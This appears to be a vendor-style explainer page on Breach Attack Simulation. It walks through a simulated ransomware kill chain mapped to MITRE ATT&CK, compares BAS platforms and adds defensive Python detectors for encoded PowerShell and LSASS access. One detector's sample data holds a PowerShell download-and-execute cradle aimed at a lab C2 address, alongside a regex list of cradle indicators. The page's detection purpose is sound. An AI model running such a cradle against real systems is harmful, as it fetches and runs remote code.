Most organisations assume their controls work.
BAS proves whether they do.

Breach Attack Simulation runs controlled, repeatable attack sequences against your actual security controls and measures what fires, what misses, and how long detection takes.

A firewall rule, an EDR policy, a SIEM detection rule, a DLP control. Each of these was configured correctly at some point. But environments change. Rules get tuned for noise. Policies get exceptions. Agents get excluded. The control you rely on may not behave the way you think it does when an attacker arrives.

Penetration testing answers "can someone get in?". Vulnerability scanning answers "what is misconfigured?". BAS answers the question both miss: if an attacker is already moving, what do your controls actually do?

A mature BAS capability runs continuously, maps findings directly to MITRE ATT&CK, produces evidence of control effectiveness across every surface, and generates actionable output for every stakeholder, from the SOC analyst tuning detection rules to the CISO presenting to the board.

Do we have endpoint protection deployed?
If an attacker dumps LSASS, does our EDR fire and does the SOC get a signal they can act on?
Do we have network segmentation?
If an attacker moves east-west from a compromised workstation, how far do they get before anything fires?
Do we have DLP controls?
If an insider compresses sensitive files into an encrypted archive and uploads to personal cloud storage, does DLP catch it?

The 4am call.
A ransomware kill chain, step by step.

This is what a full Ransomware Kill Chain simulation looks like inside a mature BAS platform. Every step maps to a real MITRE ATT&CK technique. Every gap maps to a real remediation action. This scenario is available to run interactively in the demonstration platform below.

Day −30 · Reconnaissance
The attacker was watching before you knew they existed.
A threat actor modelled on FIN7 spends three weeks doing passive reconnaissance. LinkedIn profiles of your IT helpdesk staff. MX record enumeration. Job postings that reveal your EDR vendor. None of this triggers a single alert in your environment.
T1589 Gather Victim Identity Information · T1596 Search Open Technical Databases
BAS approach: No simulation action at this phase. A mature BAS platform documents the OSINT surface your organisation exposes and uses it to build the scenario brief.
T+00:00 · Initial Access
A phishing email lands. One person opens it.
A macro-enabled XLSX labelled "Q3 Salary Review: Action Required" is delivered to three seed accounts: HR, Finance, and IT Helpdesk. The simulation records whether your email gateway quarantines it, whether the sandbox detonates the attachment, and whether user simulation triggers the macro.
T1566.001 Spearphishing Attachment · T1204.002 Malicious File
Gap found in 68% of simulations: Email sandbox fires on the attachment, but the alert is auto-closed as low priority by a SOAR playbook misconfigured six months earlier. The macro executes.
T+04:13 · Execution
PowerShell fires. A beacon phones home.
The VBA macro drops an encoded PowerShell cradle. In 8 seconds it decodes, executes in-memory, and establishes an HTTPS beacon to the C2 lab node over port 443. To a proxy that does neither TLS inspection nor behavioural baselining, the traffic is indistinguishable from normal web browsing.
T1059.001 PowerShell · T1055.001 Process Injection: DLL Injection
EDR fires at T+09m: Script-block logging catches the encoded payload. Alert raised, but the on-call analyst is triaging a separate P2 incident. The alert ages 22 minutes before acknowledgement.
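The script-block and process-creation logging that fires here records the launcher flags and the base64 argument; turning that into a signal means decoding the argument (PowerShell expects UTF-16LE under base64) and scanning both the flags and the recovered script for cradle indicators. The following is an added example for this page, not code from the demonstration platform or any vendor. The records are constructed to resemble Windows event 4688 / Sysmon event 1 process-creation fields, and the field names, the lab C2 address reused from the scenario, and the indicator list are assumptions.

```python
"""Decode -EncodedCommand launches and scan them for download-cradle
indicators (ATT&CK T1059.001).

Added example for this page, not code from the page or from any BAS product.
The records below are constructed to resemble Windows event 4688 / Sysmon
event 1 process-creation fields; the field names are an assumption.
"""
from __future__ import annotations

import base64
import re

# Strings a SOC analyst expects inside a cradle or in its launcher flags.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|frombase64string|-nop\b|-w(?:indowstyle)?\s+hidden"
    r"|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; capture the
# base64 blob that follows it.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(record: dict) -> dict | None:
    """Return a finding dict for a suspicious launch, or None when clean."""
    cmd = record["CommandLine"]
    has_blob = ENC_FLAG_RE.search(cmd) is not None
    decoded = decode_encoded_command(cmd)
    # Scan the launcher flags with the blob removed (base64 text would only
    # add noise), plus the decoded script when we have one.
    text = ENC_FLAG_RE.sub(" ", cmd) + "\n" + (decoded or "")
    hits = sorted({h.lower() for h in CRADLE_RE.findall(text)})
    if has_blob and decoded is None:
        hits.append("undecodable -EncodedCommand blob")
    if not hits:
        return None
    return {
        "host": record["Computer"],
        "pid": record["ProcessId"],
        "encoded": decoded is not None,
        "indicators": hits,
        "script_preview": (decoded or "")[:80],
    }


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: one cradle pointed at the scenario's lab C2 address,
# one routine admin script, one encoded but harmless one-liner.
SAMPLE_EVENTS = [
    {"Computer": "WIN-LAB-07", "ProcessId": 3821,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://192.168.200.10/a')")},
    {"Computer": "WIN-LAB-07", "ProcessId": 3899,
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"Computer": "FS01", "ProcessId": 1200,
     "CommandLine": "powershell.exe -e " + _encode("Get-Date")},
]


def triage(events: list[dict]) -> list[dict]:
    """Run every record through the analyser and keep only the findings."""
    return [f for f in (analyse_command_line(e) for e in events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Only the first record produces a finding: the third is encoded but decodes to `Get-Date`, which is why an encoded-command rule that alerts on the flag alone generates the noise that gets it tuned into silence. A blob that is present but will not decode is still reported, since a dumper that breaks the base64 on purpose is more interesting, not less.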
T+14:27 · Credential Access
LSASS memory access. One of the most common credential access techniques in enterprise ransomware chains.
With a foothold established, the simulation attempts LSASS memory access. On hosts without Credential Guard, this yields NTLM hashes and Kerberos tickets in under 90 seconds. This is the pivotal moment in the kill chain: catch it here and the attack ends. Miss it and everything downstream follows.
T1003.001 OS Credential Dumping: LSASS Memory · T1558.003 Kerberoasting
Critical gap: Credential Guard is not enabled on the workstation estate (it is not supported on domain controllers, which need LSA protection instead), so LSASS on the compromised workstation still holds reusable credential material. The EDR rule fires, but LSASS access succeeds. Estimated engineering effort to remediate: 4 hours. In a real attack, this is where the clock resets.
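The detection side of this step is a handle-access rule: Sysmon event 10 (ProcessAccess) records which process opened lsass.exe, with what access mask, and through which call stack. What makes the rule usable is scoring the mask bits a dumper needs (memory read, handle duplication, or the process-creation right used by fork-style snapshots) and escalating when the call trace passes through memory not backed by any loaded module. The following is an added example for this page, not code from the demonstration platform or any EDR. The records are constructed to mirror Sysmon's ProcessAccess fields; the allow-list, paths and call traces are illustrative assumptions.

```python
"""Score Sysmon event 10 (ProcessAccess) records for credential-dumping
access to lsass.exe (ATT&CK T1003.001).

Added example for this page, not code from the page or from any EDR or BAS
product. Records are constructed to mirror Sysmon's ProcessAccess fields;
the allow-list is illustrative and would be keyed on signer, path and hash
in a real deployment.
"""
from __future__ import annotations

# Access-right bits from the Win32 process security model.
PROCESS_VM_READ = 0x0010          # read another process's memory
PROCESS_DUP_HANDLE = 0x0040       # duplicate handles out of the target
PROCESS_CREATE_PROCESS = 0x0080   # required to fork/snapshot the target
DUMP_CAPABLE = PROCESS_VM_READ | PROCESS_DUP_HANDLE | PROCESS_CREATE_PROCESS

# Illustrative allow-list (assumption): system processes that legitimately
# hold read access to LSASS. Tune per estate, never per host.
ALLOWED_SOURCES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}


def score_lsass_access(ev: dict) -> dict | None:
    """Return an alert dict when the access looks like a dump, else None."""
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    if ev["SourceImage"] in ALLOWED_SOURCES:
        return None
    mask = int(ev["GrantedAccess"], 16)
    if not mask & DUMP_CAPABLE:
        return None  # query-only handles, e.g. 0x1400 from Task Manager
    reasons = []
    if mask & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ")
    if mask & PROCESS_DUP_HANDLE:
        reasons.append("PROCESS_DUP_HANDLE")
    if mask & PROCESS_CREATE_PROCESS:
        reasons.append("PROCESS_CREATE_PROCESS (fork-style dump)")
    severity = "high"
    # A call trace through memory not backed by a module means the code
    # doing the reading was injected or reflectively loaded.
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("call trace through unbacked memory")
        severity = "critical"
    return {
        "host": ev["Computer"],
        "source": ev["SourceImage"],
        "pid": ev["SourceProcessId"],
        "granted_access": hex(mask),
        "reasons": reasons,
        "severity": severity,
    }


# Constructed sample records; paths, PIDs and call traces are illustrative.
SAMPLE_EVENTS = [
    {"Computer": "WIN-LAB-07", "SourceImage": r"C:\Users\Public\mimikatz_sim.exe",
     "SourceProcessId": 4410, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2c0fe"},
    {"Computer": "WIN-LAB-07",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "SourceProcessId": 3821, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001D4A3B20F1C)"},
    {"Computer": "WIN-LAB-07", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "SourceProcessId": 612, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": ""},
    {"Computer": "FS01", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "SourceProcessId": 5120, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1400", "CallTrace": ""},
    {"Computer": "FS01", "SourceImage": r"C:\Users\Public\mimikatz_sim.exe",
     "SourceProcessId": 4411, "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": "0x1010", "CallTrace": ""},
]


def triage(events: list[dict]) -> list[dict]:
    """Alerts ordered critical first, then by host."""
    alerts = [a for a in (score_lsass_access(e) for e in events) if a]
    return sorted(alerts, key=lambda a: (a["severity"] != "critical", a["host"]))


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Two of the five records alert: the simulated dumper with a plain 0x1010 read handle, and the PowerShell process holding full access through unbacked memory, which is the reflectively loaded case. Task Manager's query-only handle and csrss.exe are ignored, and the explorer.exe target never enters the rule. This is detection only: whether the read actually returns credential material is the Credential Guard and LSA protection question above, and a BAS run should record both outcomes separately.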
T+31:00 · Lateral Movement
The attacker moves. Quietly. East-west through the estate.
Using harvested credentials, the simulation pivots to the file server via RDP, then enumerates the domain controller. Three additional workstations in the same subnet are reached via WMI. The NDR fires, but the detection threshold was raised six months ago to reduce alert volume.
T1021.001 Remote Desktop Protocol · T1047 Windows Management Instrumentation
Detection gap: 18 minutes between first lateral move and NDR alert. In a real ransomware event, that is four additional hosts compromised and backup infrastructure reached.
T+41:00 · Impact
4:17am. The call comes in.
Volume shadow copies deleted. 847 files encrypted with AES-256. Ransom note dropped to three shared directories. In the simulation, this is entirely synthetic. No real files are touched. In the real incident this scenario is modelled on, recovery took 19 days and cost £2.3M in downtime, forensics, and recovery. The controls that would have stopped it at T+14 minutes cost less than a day of engineering work to fix.
T1490 Inhibit System Recovery · T1486 Data Encrypted for Impact
Simulation result: 3 critical gaps identified. Detection coverage 68%. Mean time to detect: 22 minutes. Remediation roadmap generated. P1 fixes estimated at 6 hours of engineering work. Re-run in 30 days to validate.
BAS Agent: Simulation Output · lab.internal · synthetic telemetry only
[bas-agent] Scenario: Ransomware Kill Chain (S001) · FIN7 TTP profile
[bas-agent] Target: lab.internal · 192.168.10.0/24 · synthetic telemetry only

T+00:00 INFO Phishing lure delivered · HR-003@lab.internal · macro-enabled XLSX
T+04:13 WARN VBA macro executed · payload decoded in-memory · pid:3821 WIN-LAB-07
T+09:02 WARN PowerShell cradle · HTTPS beacon 192.168.200.10:443 established
T+14:27 CRIT LSASS memory access · mimikatz_sim.exe · EDR rule CRED-0041 FIRED
T+22:41 WARN Scheduled task 'WindowsUpdate' · persistence registered
T+24:00 CRIT Kerberoasting · 3 SVC account SPNs · hashes to C2
T+31:00 WARN RDP lateral · .14 to FS01 · harvested domain credentials
T+38:15 CRIT VSS deletion · WMI Win32_ShadowCopy.Delete() · WIN-LAB-07
T+41:00 CRIT File encryption · 847 synthetic files · .locked extension

─────────────────────────────────────────────────────
SIMULATION COMPLETE
Detection coverage: 68% (target: 90%)
Controls fired: 6 / 8
Mean time to detect: 22 minutes (target: <10m)
Critical gaps: 3 (SOAR auto-close, LSASS, NDR threshold)
P1 remediation effort: ~6 hours
─────────────────────────────────────────────────────
Report: executive-summary.pdf · remediation-roadmap.csv
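The summary figures above come from joining the agent's attack timeline with a record of which control fired, when, and what happened to the alert. The following is an added example for this page, not the demonstration platform's own code: it parses the synthetic log shown above and scores it. The technique-per-line mapping and the detection records (control, fire time, disposition, whether the action was blocked) are constructed here so the arithmetic can be followed end to end; they are not the platform's data and do not reproduce its figures.

```python
"""Turn a BAS agent event log into coverage and time-to-detect figures.

Added example for this page, not the demonstration platform's own code. The
event lines are the synthetic log shown on the page; the technique mapping
and the detection records (which control fired, when, and what the SOC did
with the alert) are constructed here so the arithmetic can be followed.
"""
from __future__ import annotations

import re
from statistics import mean, median

LOG_LINE_RE = re.compile(r"^T\+(\d{2}):(\d{2})\s+(INFO|WARN|CRIT)\s+(.*)$")

AGENT_LOG = """\
T+00:00 INFO Phishing lure delivered · HR-003@lab.internal · macro-enabled XLSX
T+04:13 WARN VBA macro executed · payload decoded in-memory · pid:3821 WIN-LAB-07
T+09:02 WARN PowerShell cradle · HTTPS beacon 192.168.200.10:443 established
T+14:27 CRIT LSASS memory access · mimikatz_sim.exe · EDR rule CRED-0041 FIRED
T+22:41 WARN Scheduled task 'WindowsUpdate' · persistence registered
T+24:00 CRIT Kerberoasting · 3 SVC account SPNs · hashes to C2
T+31:00 WARN RDP lateral · .14 to FS01 · harvested domain credentials
T+38:15 CRIT VSS deletion · WMI Win32_ShadowCopy.Delete() · WIN-LAB-07
T+41:00 CRIT File encryption · 847 synthetic files · .locked extension
"""

# One ATT&CK technique per log line, in order (assumption: the agent log
# carries no technique column, so the mapping travels with the scenario).
STEP_TECHNIQUES = [
    "T1566.001", "T1204.002", "T1059.001", "T1003.001", "T1053.005",
    "T1558.003", "T1021.001", "T1490", "T1486",
]

# Constructed detection records. 'disposition' separates an alert the SOC
# can act on from one that fired and was auto-closed (the SOAR gap in the
# narrative). 'prevented' records whether the control blocked the action.
DETECTIONS = {
    "T1566.001": {"control": "email sandbox", "fired_at": "T+00:45",
                  "disposition": "auto-closed", "prevented": False},
    "T1059.001": {"control": "EDR script-block rule", "fired_at": "T+09:40",
                  "disposition": "escalated", "prevented": False},
    "T1003.001": {"control": "EDR rule CRED-0041", "fired_at": "T+14:29",
                  "disposition": "escalated", "prevented": False},
    "T1021.001": {"control": "NDR east-west policy", "fired_at": "T+49:00",
                  "disposition": "escalated", "prevented": False},
    "T1490": {"control": "EDR VSS tamper rule", "fired_at": "T+38:20",
              "disposition": "escalated", "prevented": False},
    "T1486": {"control": "EDR ransomware behaviour rule", "fired_at": "T+41:05",
              "disposition": "escalated", "prevented": False},
}


def parse_offset(stamp: str) -> int:
    """'T+MM:SS' -> seconds since the scenario started."""
    m = re.fullmatch(r"T\+(\d{2}):(\d{2})", stamp)
    if not m:
        raise ValueError(f"bad offset: {stamp!r}")
    return int(m.group(1)) * 60 + int(m.group(2))


def parse_agent_log(text: str) -> list[dict]:
    """Keep only well-formed event lines; banners and rules are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if m:
            events.append({"t": int(m.group(1)) * 60 + int(m.group(2)),
                           "level": m.group(3), "msg": m.group(4)})
    return events


def score_run(events: list[dict], techniques: list[str], detections: dict) -> dict:
    """Coverage counts only alerts the SOC could act on; MTTD is measured
    from the attack step to the alert, not to acknowledgement."""
    if len(events) != len(techniques):
        raise ValueError("one technique per logged step is required")
    steps = []
    for ev, tech in zip(events, techniques):
        det = detections.get(tech)
        actionable = det is not None and det["disposition"] == "escalated"
        steps.append({
            "technique": tech,
            "fired": det is not None,
            "actionable": actionable,
            "prevented": bool(det and det["prevented"]),
            "delay_s": parse_offset(det["fired_at"]) - ev["t"] if actionable else None,
        })
    delays = [s["delay_s"] for s in steps if s["actionable"]]
    n = len(steps)
    return {
        "techniques_attempted": n,
        "controls_fired": sum(s["fired"] for s in steps),
        "detection_coverage_pct": round(100 * len(delays) / n, 1),
        "prevention_pct": round(100 * sum(s["prevented"] for s in steps) / n, 1),
        "mttd_mean_s": round(mean(delays)) if delays else None,
        "mttd_median_s": median(delays) if delays else None,
        "gaps": [s["technique"] for s in steps if not s["actionable"]],
    }


if __name__ == "__main__":
    report = score_run(parse_agent_log(AGENT_LOG), STEP_TECHNIQUES, DETECTIONS)
    for key, value in report.items():
        print(f"{key:>24}: {value}")
```

With these constructed records six controls fire but only five alerts are actionable, so coverage is five of nine techniques, and the email sandbox that fired and was auto-closed lands in the gap list alongside the techniques nothing saw. The mean time to detect is skewed to a few minutes by the single late NDR alert while the median is a few seconds; a report that shows only the mean hides that one slow control is the whole problem. Prevention is zero across the run even though detection is not, which is the distinction the LSASS step above turns on.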

How to evaluate a BAS platform.
Six criteria that separate mature tools from marketing claims.

Enterprise BAS platforms vary significantly in depth, breadth, and operational maturity. These six criteria cut through the marketing and surface what actually matters for a sustained continuous validation programme.

Criterion 01
MITRE ATT&CK Coverage Depth
Coverage breadth matters less than coverage accuracy. A platform claiming 2,000 TTP simulations but with shallow detection validation is less valuable than one with 500 deeply validated techniques. Ask for evidence of technique execution fidelity, not just a tactic count.
How is technique execution validated against real EDR and SIEM responses?
Does the platform distinguish between execution and detection coverage?
How frequently are TTP libraries updated to match current threat intelligence?
Criterion 02
Integration Ecosystem
A BAS platform is only as useful as its ability to ingest and correlate signals from your existing security stack. Shallow integrations that push a report without bidirectional telemetry significantly limit operational value. Prioritise platforms with native SIEM, EDR, and SOAR integrations.
Does the platform integrate natively with your SIEM and EDR vendors?
Can it automatically correlate simulated attack telemetry against detection rule firing?
Does it support bidirectional SOAR integration for automated response testing?
Criterion 03
Cloud and Hybrid Environment Coverage
Most enterprise environments are hybrid. A BAS platform that only validates endpoint and network controls misses a significant portion of the modern attack surface. Cloud control-plane attacks, identity abuse, SaaS misconfigurations, and container escapes are now mainstream threat vectors.
Does the platform simulate AWS and Azure cloud-specific attack techniques?
Can it validate IAM abuse, storage exfiltration, and cloud identity attacks?
Does it cover Kubernetes and container runtime attack techniques?
Criterion 04
Reporting and Stakeholder Output
A BAS platform that only produces technical gap reports creates a translation burden for the security team. The best platforms generate outputs that different stakeholders can act on directly, from SOC tuning notes to board-level risk summaries, without manual report writing.
Does the platform generate executive-level risk summaries alongside technical reports?
Can it produce remediation roadmaps with effort estimates and priority ordering?
Does it track improvement over time and show trend data across simulation runs?
Criterion 05
Operational Safety and Production Risk
All enterprise BAS platforms claim zero production risk but the implementation quality varies significantly. Safe simulation depends on proper agent design, execution sandboxing, rollback capabilities, and clear documentation of what each technique does and does not do in a production environment.
Is the simulation agent isolated from production processes and data?
Can individual techniques be scoped and excluded for sensitive environments?
What happens if the agent is deployed in an environment with active incident response?
Criterion 06
Deployment and Time to Value
Enterprise BAS platforms have historically required significant deployment effort and professional services engagement before delivering value. The best modern platforms reduce this dramatically. Time to first meaningful simulation result is a direct indicator of operational maturity.
What is the realistic deployment timeline from procurement to first simulation?
What professional services overhead is required to operationalise the platform?
Can the platform run in an existing lab environment before production deployment?

Enterprise BAS platform comparison.

An honest assessment of the leading enterprise BAS platforms against the six criteria above. All platforms are mature, credible options. The right choice depends on your environment, integration requirements, and team maturity.

Criterion | Cymulate | Picus Security | AttackIQ | SafeBreach | XM Cyber
MITRE ATT&CK coverage depth | Strong: 1500+ techniques, frequent updates | Strong: Picus Threat Library, weekly updates | Strong: MITRE-aligned, community content | Strong: Hacker's Playbook library | Different approach: attack path focus
Integration ecosystem | Broad: 100+ integrations, bidirectional SIEM | Strong: Picus Complete Security Validation | Strong: open platform, API-first | Good: major SIEM/EDR vendors covered | Strong: graph-based platform integrations
Cloud and hybrid coverage | AWS, Azure, GCP, SaaS, identity | Primarily endpoint and network focus | Cloud scenarios via community content | Growing cloud coverage | Cloud-native, attack path to cloud assets
Multi-stakeholder reporting | Executive, technical, and board-ready outputs | Technical-focused, some executive reporting | Technical-focused, requires customisation | Technical reports, some risk dashboards | Risk-based, business context built in
Production safety | Safe simulation, no production impact | Safe simulation, proven enterprise deployments | Safe simulation, CALDERA-based scenarios | Safe simulation, simulator-based | Agentless attack path analysis
Time to value | Rapid deployment, strong onboarding | Professional services typically required | Platform setup requires effort | Deployment overhead before first simulation | Relatively fast, agentless reduces friction
Best suited for | Broad enterprise BAS programmes needing fast deployment and wide coverage | Organisations prioritising detection validation and SOC improvement | Organisations wanting an open, community-driven platform | Organisations focused on attack simulation breadth | Organisations prioritising attack path and exposure management

Note: This comparison is based on publicly available information and professional assessment. Platform capabilities evolve rapidly. Always validate against your specific environment requirements during a proof of concept engagement.

Six things a mature BAS programme
should produce for your organisation.

Regardless of which platform you select, these are the operational outcomes a mature Breach Attack Simulation capability should be delivering within six months of deployment.

Outcome 01
Continuous, evidence-based control validation
Every major control including EDR, SIEM, DLP, NDR, and cloud security services, validated against realistic attacker behaviour on a continuous cycle, not an annual assessment. Evidence produced after every run.
Outcome 02
MITRE ATT&CK coverage mapped to your environment
A live view of which ATT&CK tactics and techniques your controls detect, which they miss, and how coverage changes over time. Prioritised by threat actor relevance to your sector and technology stack.
Outcome 03
Quantified detection and response metrics
Mean Time to Detect and Mean Time to Respond measured against realistic attack sequences, not synthetic availability metrics. Tracked over time and tied to specific control improvements.
Outcome 04
Prioritised remediation with effort estimates
Control gaps ranked by exploitability, blast radius, and remediation effort. Not a list of findings but a prioritised programme of work with owner assignment and validation criteria built in.
Outcome 05
Board and executive-level risk visibility
Security posture translated into business risk language. Exposure score, compliance coverage, and trend data that a CISO can present to the board without a six-week reporting cycle or a consultant to interpret it.
Outcome 06
Validated control effectiveness after every change
Every significant architecture change, infrastructure deployment, or security control update validated against relevant attack scenarios. Configuration drift detected and evidenced before the next incident, not discovered during one.

One simulation.
Five different conversations.

The same BAS run produces different signal for every person who needs to act on it. The demonstration platform below shows what each persona receives from a single simulation run.

CISO / CIO
Executive · Board Reporting
"If we were hit tomorrow, how far would they get and what would it cost us?"
Exposure score, detection coverage percentage, compliance posture across NIST, ISO 27001, and DORA, and a one-page board-ready summary, generated from the same test the SOC analyst just ran.
SOC Analyst
Detection · Response · Triage
"Which rules fired, which missed, and what do I tune first?"
Step-by-step event log with timestamps, alert correlation, detection rule performance table, and specific SIEM and EDR tuning recommendations per gap identified.
Security Architect
Architecture · Controls · Integration
"Where are the actual holes in our control architecture across each layer?"
Attack surface map by technology layer, integration health, east-west segmentation gaps, and per-surface coverage scores across endpoint, cloud, identity, network, and email.
Project Manager
Delivery · Remediation · Sprints
"What do we fix, in what order, who owns it, and how long does it take?"
Prioritised remediation roadmap with effort estimates, owner assignment template, 90-day sprint structure, and risk-reduction percentage per fix, ready for any project tracking tool.
Developer / DevSecOps
Pipeline · WAF · Hardening
"How does our application and pipeline hold up against WAF bypass and web app attacks?"
WAF coverage scoring, OWASP Top 10 results, deserialisation and path traversal findings, and hardening recommendations mapped to your specific stack and runtime environment.
GRC / Compliance
Audit · Frameworks · Evidence
"Can we evidence our controls to an auditor without a year-long pen test cycle?"
Control-by-control evidence mapping against NIST CSF 2.0, ISO 27001:2022, CIS Controls v8, SOC 2 Type II, and DORA with pass, partial, and fail breakdown and trend history.

Six attack chains.
Every surface covered.

The interactive demonstration below includes six scenarios mapped to real-world threat actor profiles using documented MITRE ATT&CK TTPs. These represent the attack categories a mature BAS programme should validate continuously.

Endpoint
Ransomware Kill Chain
Full LockBit 3.0-pattern kill chain from phishing delivery to file encryption. Tests EDR, backup integrity, LSASS protection, and lateral movement detection. Modelled on FIN7 TTPs.
T1566.001 · T1059.001 · T1003.001 · T1486
Cloud
Cloud Control-Plane Pivot
Credential stuffing against federated SSO, followed by IAM privilege abuse and S3 data exfiltration. Maps to AWS shared-responsibility model. Modelled on APT29 cloud TTPs.
T1078 · T1110.004 · T1098 · T1041
Identity
Active Directory Compromise
Kerberoasting through to DCSync and Golden Ticket forgery. Full AD kill chain testing identity plane resilience, PAM controls, and privileged access hard stops.
T1558.003 · T1003.006 · T1558.001 · T1550.003
WAF / Web
WAF Bypass & Web Exploit
OWASP Top 10 simulation including SQL injection, path traversal, and deserialisation RCE. Unicode encoding WAF bypass technique. Produces a WAF coverage percentage score.
T1190 · T1059.007 · T1083
Network
Lateral Movement Chain
East-west movement simulation using PsExec, WMI, SMB, and SSH pivoting. Tests micro-segmentation effectiveness, NDR detection thresholds, and east-west firewall rule coverage.
T1021.002 · T1047 · T1570
Insider
Insider Threat Data Theft
Trusted user abusing legitimate access to exfiltrate sensitive data. DLP bypass via encrypted archives. UEBA detection validation across baseline deviation scoring.
T1562.001 · T1048 · T1078

The methodology in practice.
Run it yourself.

The BreachForge demonstration platform is a working interactive implementation of the BAS methodology described on this page. It is not a commercial product. It is a technical demonstration built to show what this capability looks and feels like when properly designed and implemented.

Demonstration platform · synthetic telemetry only · no production risk

BreachForge BAS Demonstration

Run any of the six scenarios, explore the MITRE ATT&CK coverage heatmap, review threat actor profiles, generate multi-persona reports, and explore what a mature BAS operational interface should look like. All data is synthetic.

Simulations
6 attack scenarios across all major surfaces
MITRE Coverage
12-tactic heatmap with technique detail
Reports
Executive, SOC, architecture, and PM output

Implementing BAS for your organisation.
Strategy, selection, and architecture.

Selecting and implementing a BAS platform is one decision. Designing the operating model, integration architecture, detection tuning workflow, and governance framework around it is a different and equally important one. If you are evaluating BAS vendors or designing a continuous validation programme, connect to discuss the architecture and implementation approach.